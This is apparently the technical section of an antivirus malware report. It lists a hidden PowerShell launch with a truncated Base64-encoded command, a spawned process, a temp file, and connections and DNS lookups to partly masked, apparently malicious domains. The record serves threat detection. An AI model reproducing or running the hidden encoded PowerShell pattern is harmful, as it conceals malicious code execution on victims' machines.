Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABLAGkAZQBiAGcAaQBpAHQAbQBmAGoAPQAnAEwAbgB1AGEAdQBtAHkAawBkACcAOwAkAEoAZQBjAHkAcgB0AHQAbQB1AGoAeABpACAAPQAgACcANAAzADEAJwA7ACQARgB6AGUAdwBrAGcAbwB1AGEAbAB2AGQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1440
- %TEMP%\1224046.cvr
- 'uk###btr.com':443
- 'pk#.goog':80
- 'ar###stic.com':443
- 'di###print.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'uk###btr.com':443
- 'ar###stic.com':443
- 'di###print.com':443
- DNS ASK uk###btr.com
- DNS ASK pk#.goog
- DNS ASK hi#####ashi-balance.com
- DNS ASK ar###stic.com
- DNS ASK gr######lyyourssydney.com
- DNS ASK di###print.com